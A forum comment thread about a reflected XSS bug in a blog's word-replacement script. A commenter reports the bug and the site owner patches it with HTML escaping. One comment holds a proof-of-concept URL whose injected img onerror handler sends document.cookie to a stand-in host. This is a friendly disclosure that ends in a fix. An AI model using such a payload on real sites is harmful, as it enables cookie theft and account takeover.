comment by acyclicks
acyclicks  ·  3573 days ago  ·  link  ·    ·  parent  ·  post: Ruin My Website

You've written a blog post titled "Ruin My Website" detailing an XSS vulnerability you've added to your website. It's really funny.

It is easy to create a replacement that sends your cookies off to an attacker's website. Someone could send you a shortened link to a malicious replacement on twitter, or maybe right here. Depending on how your website is laid out, those cookies are likely to give an attacker access to your admin console.

---
StJohn  ·  3573 days ago  ·  link  ·  

I pushed an update to do some HTML-escaping. I think that should do the trick, although that said I did try to get the site to execute some random JS code injected via the URL and wasn't able to. Better to be safer, though, especially if other people want to crib this for their own sites.

Thanks for the tip! I made sure I credited you in the blog post as well.

---
acyclicks  ·  3573 days ago  ·  link  ·  

That was fast. Thanks for the credit. It is a fun script.

I had the xkcd substitutions extension installed for nearly a year. The car -> cat substitution was the worst. Parsing the word "cat" took quite a bit of extra effort, even in print.

---
StJohn  ·  3573 days ago  ·  link  ·  

I think that's a little bit dramatic. For a start I don't think there's anything people could get their hands on -- as far as I'm aware there are no cookies on my site. The only dynamic content at all is from that wee Twitter iframe.

If you have a proof of concept attack, I'd love to see it -- and to think about a solution. Are you talking about the risk of someone injecting JS code into the website via a link and inducing me to click on it? I could update the JS to escape the URL parameters before performing the replace.

---
acyclicks  ·  3573 days ago  ·  link  ·  

Yeah, I was thinking of someone injecting some JS code into a link, and getting you to click on it. If you have no dynamic content on the domain, then you should be safe. Also I can't imagine anyone would normally bother; I just genuinely found the title+exploit combination funny.

POC:

https://www.fuzzjunket.com/ruin-my-website/?October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27//example.com/%27%20%2B%20document.cookie;%22%20/%3E

HTML encoding the string before doing the replacement should fix it if you can be bothered.

Pseudo-edit: Just saw you already pushed a fix. That was fast. The POC did work before the fix.

---
StJohn  ·  3573 days ago  ·  link  ·  

Oooh, thank you! I'm aware inviting the Internet to ruin my site is probably like poking a sleeping dragon, but I try to stay on top of any security risks and I'm always glad to get pointers. I figured any injection attacks couldn't affect anyone but the person viewing the website, but I hadn't considered anyone trying to hook me with their nefarious schemes. The cheek. "Infamy! Infamy! They've all got it in for me!"

---